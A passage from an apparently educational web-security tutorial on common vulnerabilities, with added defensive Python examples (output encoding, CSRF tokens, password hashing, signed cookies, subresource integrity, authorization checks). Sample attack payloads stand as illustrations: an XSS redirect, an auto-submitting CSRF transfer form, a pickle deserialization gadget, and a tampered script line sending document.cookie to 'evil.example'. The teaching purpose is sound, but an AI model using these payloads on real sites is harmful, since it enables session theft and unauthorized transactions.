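The vulnerable function returns the administrator row without any password, while the parameterised function treats the whole payload as a (non-existent) username. Parameterisation, not input filtering, is the fix: the same applies to ORMs and stored procedures as long as no SQL text is built from user input.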

Cross-Site Scripting (XSS)

 What It Is:
XSS occurs when attackers inject malicious JavaScript or code into a trusted web page.
When another user loads the page, the code executes in their browser.
 What Happens:
The script runs as if it came from the site itself, often stealing session cookies or
redirecting users.
 Example:
<script>document.location='http://malicious-site.com'</script>
 Consequences:
o Stolen login sessions
o Defaced websites
o Misleading users into revealing data

Example Scenario:
A website allows users to comment on blog posts but does not sanitize input.
Attacker posts:

<script> alert('Your session is stolen'); </script>

 What Happens:
Anyone viewing that post triggers the alert. In real attacks, this script could steal cookies
or redirect users to malicious websites.
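The comment scenario above, as an added example that is not part of the original page: a server-side renderer that interpolates the comment straight into HTML, beside one that output-encodes it for the HTML text context. The comment list and the two render functions are constructed for the demonstration.

```python
import html

# Constructed comments: one benign, one carrying the page's alert payload.
COMMENTS = [
    "Great article!",
    "<script> alert('Your session is stolen'); </script>",
]


def render_comment_unsafe(text: str) -> str:
    """Puts user input straight into the markup; the browser parses it as HTML."""
    return '<div class="comment">' + text + "</div>"


def render_comment_safe(text: str) -> str:
    """Output-encodes for an HTML text node: < > & " ' become entities, so the
    browser shows the payload as text instead of executing it."""
    return '<div class="comment">' + html.escape(text, quote=True) + "</div>"


def render_page(renderer) -> str:
    """Renders every stored comment with the given renderer (stored XSS)."""
    return "\n".join(renderer(c) for c in COMMENTS)


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_page(render_comment_unsafe))
    print(render_page(render_comment_safe))
```

html.escape is the right encoding only for text between tags. Input placed inside an attribute, a JavaScript block, a URL or CSS needs the encoding for that context, which is why templating engines with context-aware auto-escaping are preferred over hand-escaping. A Content-Security-Policy and HttpOnly session cookies limit the damage when an encoding bug slips through.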

Cross-Site Request Forgery (CSRF)

 What It Is:
CSRF tricks a user into submitting a malicious request unknowingly while logged into a
trusted site.
 What Happens:
A user might click a hidden link in an email or webpage that executes an action like
transferring money or changing a password.
 Example Scenario:
A user is logged into their online banking. While visiting a malicious website, an
invisible form is auto-submitted:

<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="to" value="attacker_account">
</form>
<script> document.forms[0].submit(); </script>

 The browser attaches the user's bank session cookie to the request, so the bank thinks
the request came from the user and processes the transfer. Browsers that default cookies
to SameSite=Lax will not attach the cookie to a cross-site POST like this one, which is
why modern defences combine that cookie attribute with a per-session CSRF token that the
attacker's page cannot read.

 Consequences:
o Unauthorized transactions
o User data or settings changed without consent
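The token defence for the scenario above, as an added example that is not part of the original page: the bank's transfer handler requires a secret token that the legitimate page embeds in its form and that a cross-site page cannot obtain. The in-memory session store, the handler and the two request helpers are assumptions for the demonstration.

```python
import hmac
import secrets

# Constructed server-side session store: session id (from the cookie) -> data.
SESSIONS = {}


def create_session(user: str = "alice") -> str:
    """Logs a user in: a random session id plus a random per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid: str) -> str:
    """The real transfer page embeds the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form action="https://bank.com/transfer" method="POST">'
        '<input type="hidden" name="csrf_token" value="' + token + '">'
        '<input name="amount"><input name="to"><button>Send</button></form>'
    )


def handle_transfer(sid: str, form: dict) -> str:
    """Server-side check: the POST body must carry the token bound to the
    session identified by the cookie. Constant-time comparison avoids
    leaking the token byte by byte through timing."""
    session = SESSIONS.get(sid)
    if session is None:
        return "401 not logged in"
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return "403 csrf token missing or invalid"
    return "200 transferred " + form["amount"] + " to " + form["to"]


def forged_request(sid: str) -> str:
    """What the attacker's auto-submitted form sends: the browser adds the
    cookie (sid), but the page had no way to read the token."""
    return handle_transfer(sid, {"amount": "1000", "to": "attacker_account"})


def legitimate_request(sid: str) -> str:
    """The user submits the form the bank rendered, token included."""
    token = SESSIONS[sid]["csrf_token"]
    return handle_transfer(sid, {"amount": "50", "to": "bob", "csrf_token": token})


if __name__ == "__main__":
    sid = create_session()
    print(forged_request(sid))      # 403 ...
    print(legitimate_request(sid))  # 200 ...
```

The token only works because it lives server-side and is never exposed to other origins; pairing it with Set-Cookie ... SameSite=Lax (or Strict) and refusing to perform state changes on GET requests closes the remaining gaps.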

Security Misconfigurations

 What It Is:
These occur when developers or system administrators leave systems in an insecure
state.
 Common Misconfigurations:
o Default passwords left unchanged
o Error messages revealing sensitive information
o Unused features or services left enabled
 Example Scenario:
A developer leaves the admin dashboard exposed at https://example.com/admin
using default credentials:

Username: admin
Password: admin123

An attacker guesses the URL and logs in easily using default credentials, gaining full control
over the site.

 Consequences:
o Easy entry points for attackers
o Data leaks through misconfigured servers

Sensitive Data Exposure

 What It Is:
Failure to properly protect sensitive information such as passwords, credit card numbers,
or personal data.
 Examples of Poor Practices:
o Storing passwords in plain text
o Using outdated encryption methods
o No HTTPS encryption
 Consequences:
o Identity theft
o Financial fraud
o Legal and reputational consequences
 Example Scenario:
A website uses HTTP instead of HTTPS during login. A user connects over public Wi-Fi.
 What Happens:
A hacker on the same network uses a packet sniffer to capture the unencrypted username
and password.
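The "storing passwords in plain text" poor practice above, with its fix, as an added example that is not part of the original page: passwords are stored as salted scrypt hashes and checked with a constant-time comparison. The user store and the helper names are assumptions for the demonstration; the scrypt parameters are illustrative and should be tuned to the server.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed user store: username -> stored credential string.
USERS = {}

# Illustrative scrypt cost parameters (about 16 MiB of memory per hash).
N, R, P, DKLEN = 2 ** 14, 8, 1, 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Returns 'scrypt$<salt hex>$<digest hex>' with a fresh random salt, so two
    users with the same password get different stored values."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P, dklen=DKLEN)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recomputes the hash with the stored salt and compares in constant time."""
    scheme, salt_hex, digest_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(
        password.encode(), salt=bytes.fromhex(salt_hex), n=N, r=R, p=P, dklen=DKLEN
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def register(username: str, password: str) -> None:
    USERS[username] = hash_password(password)


def login(username: str, password: str) -> bool:
    stored = USERS.get(username)
    if stored is None:
        # Run the KDF anyway so a missing user takes as long as a wrong password.
        hash_password(password)
        return False
    return verify_password(password, stored)


if __name__ == "__main__":
    register("alice", "correct horse battery staple")
    print(login("alice", "correct horse battery staple"))  # True
    print(login("alice", "wrong"))                         # False
```

Even with this in place the password still travels in the clear over plain HTTP, so the hashing fixes the storage problem in the list above and TLS fixes the transport problem; both are needed.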

Insecure Deserialization

 What It Is:
Deserialization is the process of turning stored or transmitted data back into an object in
a program. If the application deserializes data it does not control, attackers can supply a
crafted payload that creates unexpected objects or triggers code while it is being loaded.
 What Happens:
The application might unknowingly execute malicious code or grant access to restricted
areas.
 Consequences:
o Remote Code Execution
o Escalation of privileges
o Application crashes

Example Scenario:
A web app stores user settings in a serialized object and sends it to the browser as a
cookie:

user_data = {"role":"user", "name":"John"}

The attacker modifies it:

user_data = {"role":"admin", "name":"John"}

 What Happens:
When deserialized on the server without validation, the attacker gains admin privileges.
This is the simplest form of the problem: the server trusts state that the client can edit.
Native object formats such as Java serialization, PHP unserialize() or Python pickle are
worse, because the payload can name which classes to instantiate and which methods to run,
which is how this class of bug leads to remote code execution.
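Both halves of the scenario above, as an added example that is not part of the original page: the settings cookie is made tamper-evident with an HMAC so the edited copy is rejected, and a small pickle gadget shows why native deserialization of untrusted bytes is dangerous. The key, the cookie layout and the sink function are assumptions for the demonstration; the gadget only records a call rather than doing anything harmful.

```python
import base64
import hashlib
import hmac
import json
import pickle
import secrets

# Hypothetical server-side secret; it never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def encode_settings(settings: dict, key: bytes = SERVER_KEY) -> str:
    """Cookie value = base64(JSON) + '.' + HMAC-SHA256 over the base64 part."""
    body = base64.urlsafe_b64encode(json.dumps(settings, sort_keys=True).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag


def decode_settings(cookie: str, key: bytes = SERVER_KEY):
    """Returns the settings dict, or None if the cookie is malformed or was edited."""
    try:
        body, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def tamper(cookie: str, new_settings: dict) -> str:
    """What the attacker can do: swap the body but keep the tag they cannot forge."""
    _, tag = cookie.rsplit(".", 1)
    body = base64.urlsafe_b64encode(json.dumps(new_settings, sort_keys=True).encode()).decode()
    return body + "." + tag


# --- why native deserialization is worse than a JSON field swap ---------------
CALLS = []


def sink(arg: str) -> str:
    """Stands in for os.system or any other callable the attacker picks."""
    CALLS.append(arg)
    return arg


class Gadget:
    # pickle stores (callable, args); pickle.loads() calls it while loading.
    def __reduce__(self):
        return (sink, ("arbitrary code ran during pickle.loads",))


def pickle_gadget_demo() -> str:
    blob = pickle.dumps(Gadget())   # bytes an attacker could hand to the server
    pickle.loads(blob)              # no object is even needed; the side effect is the point
    return CALLS[-1]


if __name__ == "__main__":
    cookie = encode_settings({"role": "user", "name": "John"})
    print(decode_settings(cookie))                                    # {'name': 'John', 'role': 'user'}
    print(decode_settings(tamper(cookie, {"role": "admin", "name": "John"})))  # None
    print(pickle_gadget_demo())
```

Signing makes client-held state tamper-evident, but the cleanest design keeps the role on the server, keyed by an opaque session id, so there is nothing for the client to edit. For the native formats the only safe rule is to not deserialize untrusted input at all; signing the blob helps only if the key never leaks.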

Broken Access Control

 What It Is:
Access control ensures users can only access resources they're authorized to. Broken
access control means users can access things they shouldn’t.
 Examples:
o A user accessing admin pages without permission
o Modifying the URL to access other users’ data
 Consequences:
o Data leaks
o Unauthorized actions like deleting records
 Example Scenario:
A normal user visits:

https://example.com/account/view?user=1002

Then changes the URL to:

https://example.com/account/view?user=1001

 What Happens:
If the application doesn’t check authorization properly, the user can see another person’s
account details.

Third-Party Code Abuse

 What It Is:
Web apps often rely on third-party libraries and plugins. If these are outdated or
insecure, attackers can exploit them.
 Example:
An old plugin with a known vulnerability can be used to inject malware.
 Consequences:
o Supply chain attacks
o Site defacement
o Data exfiltration
 Example Scenario:
A site uses an outdated version of a JavaScript plugin that has a known vulnerability.
 What Happens:
An attacker uses this vulnerability to run malicious code or hijack the page.
Example: Exploiting a vulnerable version of jQuery or WordPress plugin.
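One control for third-party scripts loaded from a CDN, as an added example that is not part of the original page: the site pins the reviewed script with a Subresource Integrity hash, and the browser refuses to run a modified copy. The script bodies are constructed for the demonstration; verify_sri mirrors the browser's rule of accepting any matching hash from the strongest listed algorithm.

```python
import base64
import hashlib

# Constructed script bodies: the version the site reviewed, and a modified copy
# of the kind an attacker would serve after compromising the CDN or the project.
TRUSTED_SCRIPT = b"window.plugin = { version: '1.0.0' };\n"
TAMPERED_SCRIPT = (
    b"window.plugin = { version: '1.0.0' };"
    b"fetch('https://evil.example/?c=' + document.cookie);\n"
)

STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Value for the integrity attribute: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return algo + "-" + base64.b64encode(digest).decode()


def verify_sri(content: bytes, integrity: str) -> bool:
    """Accepts if any hash of the strongest recognised algorithm in the
    attribute matches; unrecognised algorithms are ignored, as browsers do."""
    entries = [e for e in integrity.split() if "-" in e]
    strongest = max((STRENGTH.get(e.split("-", 1)[0], 0) for e in entries), default=0)
    if strongest == 0:
        return False
    for entry in entries:
        algo = entry.split("-", 1)[0]
        if STRENGTH.get(algo, 0) == strongest and sri_hash(content, algo) == entry:
            return True
    return False


def script_tag(src: str, content: bytes) -> str:
    """The tag to publish once the script has been reviewed and pinned."""
    return (
        '<script src="' + src + '" integrity="' + sri_hash(content)
        + '" crossorigin="anonymous"></script>'
    )


if __name__ == "__main__":
    tag = script_tag("https://cdn.example/plugin-1.0.0.js", TRUSTED_SCRIPT)
    print(tag)
    print(verify_sri(TRUSTED_SCRIPT, sri_hash(TRUSTED_SCRIPT)))   # True
    print(verify_sri(TAMPERED_SCRIPT, sri_hash(TRUSTED_SCRIPT)))  # False
```

SRI only pins what the browser fetches; it does not make an old, vulnerable plugin safe. Keeping dependencies updated and checking them against published advisories is still required, and SRI then guarantees that the reviewed build is the one that actually runs.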


API Attacks

 What It Is:
APIs (Application Programming Interfaces) allow systems to communicate. If APIs are
insecure, attackers can manipulate them to access data or take control.
 Example:
Changing an API call’s user ID to access someone else’s profile or data.
 Consequences:
o Unauthorized data access
o Service disruption
o Misuse of business logic
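The Broken Access Control scenario above (changing user=1002 to user=1001 in the URL) and the API example ("changing an API call's user ID") are the same bug, so one added example serves both; it is not part of the original page. A handler that trusts the id from the request is shown beside one that checks object-level authorization on every call. The account data, roles and route are constructed for the demonstration.

```python
from typing import Optional, Tuple

# Constructed data: accounts keyed by numeric id, each owned by one user.
ACCOUNTS = {
    1001: {"owner": "alice", "balance": 5200},
    1002: {"owner": "bob", "balance": 310},
}
ROLES = {"alice": "user", "bob": "user", "carol": "support"}


class Forbidden(Exception):
    pass


def view_account_unsafe(current_user: str, account_id: int) -> dict:
    """Trusts the id taken from the URL or API call: any logged-in user
    can read any account (an insecure direct object reference)."""
    return ACCOUNTS[account_id]


def view_account_safe(current_user: str, account_id: int) -> dict:
    """Object-level authorization: the caller must own the account or hold a
    role explicitly allowed to read it, checked on every request."""
    account = ACCOUNTS.get(account_id)
    if account is None:
        raise Forbidden("not found")
    if account["owner"] != current_user and ROLES.get(current_user) != "support":
        raise Forbidden("forbidden")
    return account


def handle_api_request(current_user: str, path: str) -> Tuple[int, Optional[dict]]:
    """Minimal router for GET /api/accounts/<id>; returns (status, body).
    Missing and forbidden accounts both give 404 so ids cannot be enumerated."""
    prefix = "/api/accounts/"
    if not path.startswith(prefix) or not path[len(prefix):].isdigit():
        return 404, None
    try:
        return 200, view_account_safe(current_user, int(path[len(prefix):]))
    except Forbidden:
        return 404, None


if __name__ == "__main__":
    print(view_account_unsafe("bob", 1001))            # bob reads alice's account
    print(handle_api_request("bob", "/api/accounts/1001"))  # (404, None)
    print(handle_api_request("bob", "/api/accounts/1002"))  # (200, {...})
```

The check belongs in the data-access layer, not in the UI: hiding the link or the menu item does nothing once the attacker edits the id by hand. Audit logging of 404s on these routes also gives detection teams a signal, because an honest client rarely requests ids it does not own.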

Real-World Case Studies

Attack Type     Real Example                 Impact
SQL Injection   Sony Pictures (2011)         Attackers dumped customer account data through an injectable web form and leaked it online.
XSS             MySpace "Samy" worm (2005)   Over a million profiles were infected in under a day by self-replicating XSS code.
CSRF            YouTube exploit (2008)       Attackers posted malicious comments that tricked users into rating videos.
Data Exposure   Equifax breach (2017)        Data on about 147 million people was stolen after an unpatched Apache Struts flaw was exploited.
API Abuse       Facebook (2018)              A bug in the "View As" feature leaked access tokens that were used against the Graph API to pull personal data of about 30 million users.
